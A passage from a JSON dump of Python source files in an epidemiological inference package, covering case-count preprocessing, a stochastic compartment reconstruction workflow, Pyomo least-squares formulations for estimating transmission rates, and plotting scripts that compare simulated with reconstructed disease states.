corresponds to a different day, and each column is a different county (node).\n The cumulative reported cases must all start at zero in order to be\n consistent with other model assumptions in the reconstruction module. 
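\n\n    Example (illustrative; the array names below are placeholders)::\n\n        res = np_reported_cases_from_cumulative(dates=dates, counties=counties,\n                                                cumulative_reported_cases=cumulative)\n        # res.dates drops the first day; res.values has shape (len(dates)-1, len(counties))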
\n \"\"\"\n # check the types\n assert isinstance(dates, np.ndarray) and dates.dtype == np.object\n assert isinstance(counties, np.ndarray) and counties.dtype == np.object\n \n # check the sizes of the incoming data\n if len(dates) != cumulative_reported_cases.shape[0] or \\\n len(counties) != cumulative_reported_cases.shape[1]:\n raise ValueError('Dimension error in np_reported_cases_from_cumulative.'\n ' length of dates must be equal to the number of rows in'\n ' cumulative_reported_cases and length of counties '\n ' must be equal to the number of columns in'\n ' cumulative_reported_cases.'\n )\n\n if sum(cumulative_reported_cases[0,:]) > 0:\n # This is necessary since we assume that S0, E0, and I0 are all zero.\n # Therefore, we need to start well before the beginning of the\n # reported cases\n raise ValueError('np_reported_cases_from_cumulative: The first'\n ' row for cumulative_reported_cases must'\n ' all be zero. These procedures assume the data spans'\n ' the entire timeline (from prior to the initial reported'\n ' case.'\n '\\nFirst row:\\n{}'.format(list((c,v) for c,v in zip(counties,cumulative_reported_cases[0,:])))\n )\n\n np_reported_cases = np.diff(cumulative_reported_cases, axis=0)\n dates = dates[1:]\n\n # sanity check - the cumulative reported cases should be non-decreasing\n # therefore, we should not have any negative reported cases\n if np.any(np_reported_cases < 0):\n raise ValueError('df_reported_cases_from_cumulative: Negative reported'\n ' cases detected for an interval. Columns in df_cumulative_reported_cases'\n ' must all be non-decreasing.')\n\n return Bunch(dates=dates, counties=counties, values=np_reported_cases)\n\n" }, { "alpha_fraction": 0.6603325605392456, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 30.549999237060547, "blob_id": "57b85ff3cf8d8b8e5ced095decbff09124b1184f", "content_id": "7e122a2bed5d10ddf5c944d7485cdaf6095b8703", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1263, "license_type": "no_license", "max_line_length": 74, "num_lines": 40, "path": "/setup.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "\"\"\"\nSetup for epi_inference package\n\"\"\"\n\nimport os\nfrom setuptools import setup, find_packages\n\nrequires=[ 'pyomo', 'pyyaml', 'recursive_diff' ]\n\nsetup(name=\"epi_inference\",\n version='1.0.dev0',\n maintainer='Carl D. Laird',\n maintainer_email='cdlaird@sandia.gov',\n platforms = [\"any\"],\n python_requires='>=3.6',\n description = 'Tools to perform inference for epidemiological models',\n long_description = \"\"\"\nThis package was developed to estimate disease transmission parameters\nassociated with epidemiology models. The package includes several\ninference approaches.\n\nThis package relies on the Pyomo modeling software. 
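For example, the least-squares inference formulations in this package call the IPOPT solver through Pyomo's SolverFactory, so a working IPOPT installation is needed to run them. 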
Pyomo and other\noptimization solvers need to be installed to use these inference methods.\n\"\"\",\n long_description_content_type='text/markdown',\n classifiers = [\n 'Development Status :: 3 - Alpha',\n 'Natural Language :: English',\n 'Operating System :: Unix',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3.8',\n 'Topic :: Scientific/Engineering :: Mathematics'],\n packages=find_packages(),\n keywords=['utility'],\n install_requires=requires,\n entry_points=\"\"\"\n [console_scripts]\n epiinf = epi_inference.epiinf:main\n \"\"\"\n )\n\n" }, { "alpha_fraction": 0.7684210538864136, "alphanum_fraction": 0.7789473533630371, "avg_line_length": 22.75, "blob_id": "7d8f32fa2fb4703e29bbd27cc6b3681aa6070eee", "content_id": "5619f977401c0168d6b46163b100e963f69f47e5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 95, "license_type": "no_license", "max_line_length": 45, "num_lines": 4, "path": "/epi_inference/workflow/__init__.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "# epi_inference.workflow\n\nfrom . import Rtest_wf\nfrom . import inference_json2csv_by_county_wf\n" }, { "alpha_fraction": 0.6358894109725952, "alphanum_fraction": 0.6374543309211731, "avg_line_length": 32.622806549072266, "blob_id": "fd24e9045b45bc13f835f7a0da875f2fa8e0655e", "content_id": "7483041553efa1b41fd7661076d6d14007d066e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3834, "license_type": "no_license", "max_line_length": 294, "num_lines": 114, "path": "/epi_inference/reconstruction/recon_stochastic_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run']\n\nimport sys\nimport datetime\n#import pandas as pd\nfrom pyutilib.misc import timing\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\nfrom ..util import load_population, save_results\nfrom ..collect.misc import load_collect\nfrom ..reconstruction.stochastic import stochastic_reconstruction\nfrom ..reconstruction.common import reported_cases_from_cumulative\n\n\ndef run_county(county, df, population, CONFIG, warnings):\n #\n # Initialize results dictionary\n #\n results = {'FIPS':county}\n for key, value in CONFIG.get('factor_levels',{}).items():\n if not key in results:\n results[key] = value\n #\n # Get the cumulative cases\n #\n cumulative_reported_cases = df[county].to_list()\n\n # reconstruct the states\n Cdates = [datetime.date.fromisoformat(day) for day in df.index.to_list()]\n reported_cases_per_day = \\\n reported_cases_from_cumulative(dates=Cdates,\n cumulative_reported_cases=cumulative_reported_cases)\n\n # Setup arguments for stochastic_reconstruction\n args = {'dates':reported_cases_per_day.dates,\n 'reported_cases_per_day':reported_cases_per_day.values,\n 'population':population,\n 'n_steps_per_day':CONFIG['n_steps_per_day']}\n for option in ['reporting_delay_mean', 'reporting_delay_dev', 'reporting_multiplier', 'fixed_incubation', 'infectious_lower', 'infectious_upper', 'seed']:\n if option in CONFIG:\n args[option] = CONFIG[option]\n res = stochastic_reconstruction(**args)\n\n results['dates'] = res.dates\n results['transmissions'] = res.transmissions\n results['S'] = res.S\n results['E'] = res.E\n results['I1'] = res.I1\n results['I2'] = res.I2\n results['I3'] = res.I3\n results['R'] = res.R\n results['population'] = population\n 
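# keep the raw reported-case series alongside the reconstructed compartments for downstream summaries\n    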
results['orig_rep_cases'] = res.orig_rep_cases\n return results\n\n\ndef run(CONFIG, warnings):\n #\n # Load the population data\n #\n population_df = load_population(CONFIG['population_csv']['file'], CONFIG['population_csv']['index'])\n #\n # Load the case data \n #\n df = load_collect(CONFIG['input_csv'])\n #\n # Perform construction\n #\n results = {}\n if 'county' in CONFIG:\n counties = [CONFIG['county']]\n else:\n counties = df.keys()\n\n if CONFIG['verbose']:\n timing.tic()\n for t in counties:\n if t not in population_df[CONFIG['population_csv']['population']]:\n warnings.append(\"WARNING: county %s does not have population data available\" % str(t))\n continue\n results[t] = run_county(t, df, population_df[CONFIG['population_csv']['population']][t], CONFIG, warnings)\n if CONFIG['verbose']:\n timing.toc(\"Serial Execution\")\n #\n # Save results\n #\n save_results(results, CONFIG['output_json'])\n save_metadata(CONFIG, warnings)\n\n\nclass ReconstructionStochastic(Task):\n\n def __init__(self):\n Task.__init__(self, \"reconstruction_stochastic\",\n \"Perform stochastic compartment reconstruction.\")\n\n def validate(self, CONFIG):\n valid_options = set(['reporting_delay_mean', 'reporting_delay_dev', 'reporting_multiplier', 'fixed_incubation', 'infectious_lower', 'infectious_upper', 'seed', 'n_steps_per_day', 'population_csv', 'input_csv', 'county', 'output_json', 'verbose', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n run(CONFIG, self._warnings)\n\n def warnings(self):\n return self._warnings\n\n\nregister_task(ReconstructionStochastic())\n\n" }, { "alpha_fraction": 0.5954315662384033, "alphanum_fraction": 0.6136747002601624, "avg_line_length": 41.350650787353516, "blob_id": "3205d85caea29dee0655fb10f4fc7d777e6b9e46", "content_id": "9b3d7c7ed5d16f045fa6fa21e8ed37252192428e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6523, "license_type": "no_license", "max_line_length": 177, "num_lines": 154, "path": "/epi_inference/formulations/attic/multinode_decay_multibeta_lsq.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import assert_optimal_termination\nimport math\n\nfrom ..tseir_utils import compute_compartments_decay\n\n\ndef run_multinode_decay_multibeta_lsq(cm_rep_cases, population, sigma, gamma, deltaP, reporting_factor, verbose=False):\n assert sigma > 0\n assert gamma > 0\n assert deltaP > 0\n assert reporting_factor >= 1\n\n m = create_inference_formulation_multinode_decay_multibeta_lsq(\n cumulative_reported_cases=cm_rep_cases,\n population=population, sigma=sigma,\n gamma_1=gamma*3, gamma_2=gamma*3, gamma_3=gamma*3,\n deltaP=deltaP, reporting_factor=reporting_factor,\n verbose=verbose\n )\n\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n assert_optimal_termination(status)\n\n results = {}\n for i in m.beta:\n results['est_beta_week'+str(i)] = value(m.beta[i])\n return results\n\ndef create_inference_formulation_multinode_decay_multibeta_lsq(cumulative_reported_cases, population, sigma, gamma_1, gamma_2, gamma_3, deltaP, reporting_factor, verbose=False):\n \"\"\"\n Creates a nonlinear one-step-ahead inference model using a decay\n model with 3 I compartments. 
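(The calling routine passes gamma_1 = gamma_2 = gamma_3 = 3*gamma, so splitting I into three stages preserves the mean infectious period.) 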
The model is written in terms of absolute\n numbers of cases (not ln-transform). The model combines estimates across\n multiple time series, one for each node.\n\n Parameters\n ----------\n\n cumulative_reported_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n population : a dataframe with a single column that represents the\n population for different columns in cumulative_reported_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n deltaP : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n model = pe.ConcreteModel()\n\n # Cached data\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.deltaP = deltaP\n model.reporting_factor = reporting_factor\n\n #\n # NOTE: Here we assume that all time series have the same length\n #\n numcases = cumulative_reported_cases.shape[0]\n model.TIMES_beta = pe.Set(initialize=[i for i in range((numcases-1+6)//7)], ordered=True)\n model.beta_offset = 7*((numcases-1+6)//7) - numcases + 1\n model.beta = pe.Var(model.TIMES_beta, initialize=1.3, bounds=(0,None)) # transmission parameter\n ## IS THIS AN ERROR?\n ##model.alpha = pe.Var(initialize=1.0)\n ##model.alpha.fix(1.0)\n\n counter = [0]*((numcases-1+6)//7)\n #print(\"len(cases)\", len(cumulative_reported_cases['12121']))\n #print(\"len(cases)\", len(cumulative_reported_cases['12121'].to_list()))\n #print(\"cases\", cumulative_reported_cases['12121'].to_list())\n #print(\"HERE\", numcases, 7*((numcases+6)//7), model.beta_offset)\n #model.TIMES_beta.pprint()\n #print(counter)\n\n #model.A = pe.Set(initialize=[v for v in cumulative_reported_cases.keys().to_list()])\n model.A = pe.Set(initialize=list(range(len(cumulative_reported_cases.keys()))))\n\n def block_rule(B, nodeid):\n # Cached data\n B.N = population.iloc[nodeid] # overall population\n reported_cases = [v[0] for v in cumulative_reported_cases.iloc[:, [nodeid] ].values]\n\n cases, S, E, I1, I2, I3, R = compute_compartments_decay(cumulative_reported_cases=reported_cases,\n population=B.N,\n sigma=sigma,\n gamma_1=gamma_1, gamma_2=gamma_2, gamma_3=gamma_3,\n deltaP=deltaP, reporting_factor=reporting_factor)\n assert(len(cases) == len(reported_cases))\n\n if verbose:\n print('corrected case data being used:')\n print(cases)\n\n # define the set of times\n B.timesteps = [i for i in range(len(cases))]\n B.TIMES = pe.Set(initialize=B.timesteps, ordered=True)\n B.TIMES_m_one = pe.Set(initialize=B.timesteps[1:], ordered=True)\n\n #print(\"id\", nodeid)\n #print(\"LEN(CASES)\", len(cases))\n #print(\"cases\", cases)\n #print(\"TIMES\")\n #B.TIMES.pprint()\n\n # define the case count variables\n B.Chat = pe.Var(B.TIMES_m_one, initialize=1.0)\n\n # infection process\n def _infection_process(b, t):\n if t == b.TIMES.last():\n return pe.Constraint.Skip\n counter[(t+model.beta_offset)//7] = counter[(t+model.beta_offset)//7] + 1\n return b.Chat[t+1] == model.beta[(t+model.beta_offset)//7] * (I1[t] + I2[t] + I3[t]) * S[t] / b.N\n B.infection_process = pe.Constraint(B.TIMES, rule=_infection_process)\n\n # 
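note: Chat[t] is the one-step-ahead predicted case count, so this is a per-node sum of squared residuals (aggregated over nodes in total_lse)\n        # 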
least squares objective function\n def _lse(b):\n return sum( (b.Chat[t] - cases[t])**2 for t in b.TIMES_m_one)\n B.lse = pe.Expression(rule=_lse)\n\n model.b = pe.Block(model.A, rule=block_rule)\n\n def _total_lse(m):\n return sum( m.b[a].lse for a in m.A )\n model.total_lse = pe.Objective(rule=_total_lse)\n\n ## likelihood objective function\n #def _like(m):\n # #return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one if I1[t-1] + I2[t-1] + I3[t-1] > 0) + \\\n # # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one)\n # return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one if I1[t] + I2[t] + I3[t] > 0) + \\\n # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one)\n #model.like = pe.Objective(rule=_like, sense=pe.maximize)\n #model.like.deactivate()\n\n if verbose:\n print(\"counter\",counter)\n\n return model\n\n" }, { "alpha_fraction": 0.5727733373641968, "alphanum_fraction": 0.5899106860160828, "avg_line_length": 42.40559387207031, "blob_id": "327ea7126e8ce6835feee2e182358937591b3e3b", "content_id": "57c2e52bd48c6f30e7188abebe036b0f493cdf76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12429, "license_type": "no_license", "max_line_length": 130, "num_lines": 286, "path": "/epi_inference/evaluation/reconstruction/single-simulation/reconstruction_steps_per_day.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport os\nfrom datetime import datetime\nfrom epi_inference.reconstruction.common import reported_cases_from_cumulative\nfrom epi_inference.reconstruction.stochastic import stochastic_reconstruction\nfrom epi_inference.reconstruction.deterministic import reconstruct_states_deterministic_decay\nfrom epi_inference.simulation.simulation import simulate_discrete_seiiir_stochastic\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.backends.backend_pdf import PdfPages\n\"\"\"\nThis module runs reconstructions on data from a stochastic simulation\nand produces some figures showing the results.\n\"\"\"\n\ndef compare_simulation_and_reconstruction(tf, fname):\n output_path = os.path.dirname(fname)\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n N=100000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5.2\n gamma = 1/4.3\n beta = 2.2*gamma\n rho = 10\n report_delay = 8\n tx = [0]*tf\n tx[30] = 1\n\n sim = simulate_discrete_seiiir_stochastic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n dfsim_S = pd.DataFrame({'dates': sim.SEIIIR.dates, 'values':sim.SEIIIR.S}).set_index('dates')\n dfsim_T = pd.DataFrame({'dates': sim.SEIIIR.dates, 'values':sim.SEIIIR.transmissions}).set_index('dates')\n dfsim_E = pd.DataFrame({'dates': sim.SEIIIR.dates, 'values':sim.SEIIIR.E}).set_index('dates')\n dfsim_I1 = pd.DataFrame({'dates': sim.SEIIIR.dates, 'values':sim.SEIIIR.I1}).set_index('dates')\n dfsim_I2 = pd.DataFrame({'dates': sim.SEIIIR.dates, 'values':sim.SEIIIR.I2}).set_index('dates')\n dfsim_I3 = pd.DataFrame({'dates': sim.SEIIIR.dates, 'values':sim.SEIIIR.I3}).set_index('dates')\n dfsim_R = pd.DataFrame({'dates': sim.SEIIIR.dates, 'values':sim.SEIIIR.R}).set_index('dates')\n\n Ccases = 
np.round(sim.cumulative_reported_cases.values).astype(int)\n Cdates = sim.cumulative_reported_cases.dates\n\n dfstoch_S = None\n dfstoch_T = None\n dfstoch_E = None\n dfstoch_I1 = None\n dfstoch_I2 = None\n dfstoch_I3 = None\n dfstoch_R = None\n bunch_reported_cases_per_day = reported_cases_from_cumulative(dates=Cdates,\n cumulative_reported_cases=Ccases)\n for real in range(100):\n bunch_recon = stochastic_reconstruction(\n dates=bunch_reported_cases_per_day.dates,\n reported_cases_per_day=bunch_reported_cases_per_day.values,\n population=N,\n n_steps_per_day=1,\n reporting_delay_mean=8,\n reporting_delay_dev=1.35,\n reporting_multiplier=10,\n fixed_incubation=5.2,\n infectious_lower=2.6,\n infectious_upper=6.0,\n )\n\n if dfstoch_S is None:\n dates = bunch_recon.dates\n dfstoch_S = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_T = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_E = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_I1 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_I2 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_I3 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_R = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n \n dfstoch_S['{}'.format(real)] = bunch_recon.S\n dfstoch_T['{}'.format(real)] = bunch_recon.transmissions\n dfstoch_E['{}'.format(real)] = bunch_recon.E\n dfstoch_I1['{}'.format(real)] = bunch_recon.I1\n dfstoch_I2['{}'.format(real)] = bunch_recon.I2\n dfstoch_I3['{}'.format(real)] = bunch_recon.I3\n dfstoch_R['{}'.format(real)] = bunch_recon.R\n\n # do a deterministic reconstruction\n det_recon = reconstruct_states_deterministic_decay(\n dates=bunch_reported_cases_per_day.dates,\n reported_cases_per_day=bunch_reported_cases_per_day.values,\n population=N,\n sigma=1/5.2,\n gamma=1/4.3,\n reporting_factor=10,\n report_delay=8\n )\n\n with PdfPages(fname) as pdf:\n ax = dfstoch_S.plot(color='silver', legend=False)\n dfsim_S[dfsim_S.index.isin(dfstoch_S.index)].plot(ax=ax, color='black', legend='Simulated S')\n detdf = pd.DataFrame({'dates': pd.to_datetime(det_recon.dates), 'det_recon_S':det_recon.S}).set_index('dates')\n detdf[detdf.index.isin(dfstoch_S.index)].plot(ax=ax, color='red', legend='det_recon')\n plt.title('S comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfstoch_T.plot(color='silver', legend=False)\n dfsim_T[dfsim_T.index.isin(dfstoch_T.index)].plot(ax=ax, color='black', legend='Simulated T')\n detdf = pd.DataFrame({'dates': pd.to_datetime(det_recon.dates), 'det_recon_T':det_recon.transmissions}).set_index('dates')\n detdf[detdf.index.isin(dfstoch_S.index)].plot(ax=ax, color='red', legend='det_recon')\n plt.title('Comparison of daily transmissions')\n pdf.savefig()\n plt.close()\n \n ax = dfstoch_E.plot(color='silver', legend=False)\n dfsim_E[dfsim_E.index.isin(dfstoch_E.index)].plot(ax=ax, color='black', legend='Simulated E')\n detdf = pd.DataFrame({'dates': pd.to_datetime(det_recon.dates), 'det_recon_E':det_recon.E}).set_index('dates')\n detdf[detdf.index.isin(dfstoch_S.index)].plot(ax=ax, color='red', legend='det_recon')\n plt.title('E comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfstoch_I1.plot(color='silver', legend=False)\n dfsim_I1[dfsim_I1.index.isin(dfstoch_I1.index)].plot(ax=ax, color='black', legend='Simulated I1')\n detdf = pd.DataFrame({'dates': pd.to_datetime(det_recon.dates), 'det_recon_I1':det_recon.I1}).set_index('dates')\n 
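# overlay the deterministic reconstruction (red) on the stochastic ensemble (silver) and the simulation (black)\n        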
detdf[detdf.index.isin(dfstoch_S.index)].plot(ax=ax, color='red', legend='det_recon')\n plt.title('I1 comparison')\n pdf.savefig()\n plt.close()\n \n ax = dfstoch_I2.plot(color='silver', legend=False)\n dfsim_I2[dfsim_I2.index.isin(dfstoch_I2.index)].plot(ax=ax, color='black', legend='Simulated I2')\n detdf = pd.DataFrame({'dates': pd.to_datetime(det_recon.dates), 'det_recon_I2':det_recon.I2}).set_index('dates')\n detdf[detdf.index.isin(dfstoch_S.index)].plot(ax=ax, color='red', legend='det_recon')\n plt.title('I2 comparison')\n pdf.savefig()\n plt.close()\n \n ax = dfstoch_I3.plot(color='silver', legend=False)\n dfsim_I3[dfsim_I3.index.isin(dfstoch_I3.index)].plot(ax=ax, color='black', legend='Simulated I3')\n detdf = pd.DataFrame({'dates': pd.to_datetime(det_recon.dates), 'det_recon_I3':det_recon.I3}).set_index('dates')\n detdf[detdf.index.isin(dfstoch_S.index)].plot(ax=ax, color='red', legend='det_recon')\n plt.title('I3 comparison')\n pdf.savefig()\n plt.close()\n\n ax = dfstoch_R.plot(color='silver', legend=False)\n dfsim_R[dfsim_R.index.isin(dfstoch_R.index)].plot(ax=ax, color='black', legend='Simulated I3')\n detdf = pd.DataFrame({'dates': pd.to_datetime(det_recon.dates), 'det_recon_R':det_recon.R}).set_index('dates')\n detdf[detdf.index.isin(dfstoch_S.index)].plot(ax=ax, color='red', legend='det_recon')\n plt.title('R comparison')\n pdf.savefig()\n plt.close()\n\n\n dfsim_R = dfsim_R[:dfstoch_R.index[-1]].astype(float)\n dfstoch_R = dfstoch_R[dfsim_R.index[0]:]\n dferr_R = dfstoch_R.subtract(dfsim_R['values'], axis=0)\n ax = dferr_R.mean(axis=1).plot(color='silver', legend=False)\n print(dferr_R.mean(axis=1))\n plt.title('R Errors')\n pdf.savefig()\n plt.close()\n\n #ax = dfstoch_T.cumsum().plot(color='silver', legend=False)\n #dfsim_R.plot(ax=ax, color='black', legend='Simulated R')\n #plt.title('R comparison')\n #pdf.savefig()\n #plt.close()\n\n return\n\ndef generate_reconstruction_figures(Cdates, Ccases, fname, comment):\n output_path = os.path.dirname(fname)\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n dfstoch_S = None\n dfstoch_T = None\n dfstoch_E = None\n dfstoch_I1 = None\n dfstoch_I2 = None\n dfstoch_I3 = None\n dfstoch_R = None\n for real in range(100):\n rdates, reported_cases_per_day = reported_cases_from_cumulative(Cdates, Ccases)\n dates, T, S, E, I1, I2, I3, R = stochastic_reconstruction(rdates, reported_cases_per_day, N, 1)\n\n if dfstoch_S is None:\n dfstoch_S = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_T = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_E = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_I1 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_I2 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_I3 = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n dfstoch_R = pd.DataFrame({'dates': pd.to_datetime(dates)}).set_index('dates')\n \n dfstoch_S['{}'.format(real)] = S\n dfstoch_T['{}'.format(real)] = T\n dfstoch_E['{}'.format(real)] = E\n dfstoch_I1['{}'.format(real)] = I1\n dfstoch_I2['{}'.format(real)] = I2\n dfstoch_I3['{}'.format(real)] = I3\n dfstoch_R['{}'.format(real)] = R\n\n with PdfPages(fname) as pdf:\n ax = dfstoch_S.plot(color='silver', legend=False)\n plt.title('S {}'.format(comment))\n pdf.savefig()\n plt.close()\n\n ax = dfstoch_T.plot(color='silver', legend=False)\n plt.title('daily transmissions {}'.format(comment))\n pdf.savefig()\n plt.close()\n \n ax 
= dfstoch_E.plot(color='silver', legend=False)\n plt.title('E {}'.format(comment))\n pdf.savefig()\n plt.close()\n\n ax = dfstoch_I1.plot(color='silver', legend=False)\n plt.title('I1 {}'.format(comment))\n pdf.savefig()\n plt.close()\n \n ax = dfstoch_I2.plot(color='silver', legend=False)\n plt.title('I2 {}'.format(comment))\n pdf.savefig()\n plt.close()\n \n ax = dfstoch_I3.plot(color='silver', legend=False)\n plt.title('I3 {}'.format(comment))\n pdf.savefig()\n plt.close()\n\n ax = dfstoch_R.plot(color='silver', legend=False)\n plt.title('R {}'.format(comment))\n pdf.savefig()\n plt.close()\n\n\"\"\"\ndef compare_stepsize_and_not_stepsize_reconstruction(tf):\n N=100000\n y0={'S': N, 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n sigma = 1/5.2\n gamma = 1/4.3\n beta = 2.2*gamma\n rho = 10\n report_delay = 8\n tx = [0]*tf\n tx[30] = 1\n\n Cdates,Ccases,dates,T,S,E,I1,I2,I3,R = \\\n simulate_discrete_seiiir_stochastic(y0, tf, beta=beta,\n sigma=sigma, gamma=gamma,\n rho=rho, N=N,\n report_delay=report_delay,\n tx=tx)\n\n np.random.seed(42)\n rdates, rcases, dates, T, S, E, I1, I2, I3, R = stochastic_reconstruction(Cdates, Ccases, N, 1)\n np.random.seed(42)\n rdatesb, rcasesb, datesb, Tb, Sb, Eb, I1b, I2b, I3b, Rb = stochastic_reconstruction(Cdates, Ccases, N)\n\n for i,v in enumerate(rcases):\n assert rdates[i] == rdatesb[i]\n assert abs(v - rcasesb[i]) <= 1e-10\n\n for i in range(len(dates)):\n assert dates[i] == datesb[i]\n assert abs(T[i] - Tb[i]) <= 1e-10\n assert abs(S[i] - Sb[i]) <= 1e-10\n assert abs(E[i] - Eb[i]) <= 1e-10\n assert abs(I1[i] - I1b[i]) <= 1e-10\n assert abs(I2[i] - I2b[i]) <= 1e-10\n assert abs(I3[i] - I3b[i]) <= 1e-10\n assert abs(R[i] - Rb[i]) <= 1e-10\n\"\"\"\n\nif __name__ == '__main__':\n np.random.seed(1975)\n # compare_stepsize_and_not_stepsize_reconstruction(tf=60)\n compare_simulation_and_reconstruction(120, './figures/reconstruction-steps_per_day.pdf')\n \n\n \n" }, { "alpha_fraction": 0.6332955956459045, "alphanum_fraction": 0.6417326927185059, "avg_line_length": 39.831932067871094, "blob_id": "600389427316a3259e162e005033f03cb67d6353", "content_id": "22e9e870b687e8fe37a572da4ee2a9847da1687e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9719, "license_type": "no_license", "max_line_length": 228, "num_lines": 238, "path": "/epi_inference/formulations/attic/multibeta_singeomegawin_wc_decay_lsq.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import check_optimal_termination\nimport pandas as pd\nfrom datetime import datetime\nfrom . import reconstruction as recon\n\ndef run_multibeta_singleomegawin_decay_lsq(cm_rep_cases, populations, sigma, gamma, report_delay, reporting_factor, analysis_window, verbose=False):\n \"\"\"\n This function solves the least-squares inference inference formulation\n using the decay-based reconstruction function. \n\n Each county has a separate beta value, but a common set of omega\n multipliers.\n\n Parameters\n ----------\n\n cm_rep_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n populations : a dataframe with a single column that represents the\n population for different columns in cm_rep_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. 
This will be multiplied\n by 3 when applied to each of the three I compartments\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n # check the inputs\n assert sigma > 0\n assert gamma > 0\n assert report_delay > 0\n assert (populations > 0).all().all() == True\n assert reporting_factor >= 1\n\n # ToDo: this needs to be passed in - for now create a default set of dates\n ##Cdates = pd.date_range(end=datetime(year=2020, month=4, day=12), periods=len(cm_rep_cases)).to_pydatetime().tolist()\n\n # create the Pyomo optimization formulation\n m = create_inference_formulation_multibeta_singleomegawin_decay_lsq(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases,\n populations=populations,\n sigma=sigma,\n gamma_1=gamma*3,\n gamma_2=gamma*3,\n gamma_3=gamma*3,\n report_delay=report_delay,\n reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n verbose=verbose\n)\n\n # call the solver\n verbose=True\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n\n m.pprint()\n m.display()\n\n est_beta = {}\n est_omega = {}\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'est_beta': est_beta, 'est_omega': est_omega, 'status': 'failed', 'msg': 'Unknown solver error.'}\n\n for o in m.omega.values():\n if o.value == True:\n return {'est_beta': est_beta, 'est_omega': est_omega, 'status': 'failed', 'msg': 'Transmission parameter scaling value omega not solved (stale).'}\n # check that the beta value was successfully solved\n for i in m.b:\n if 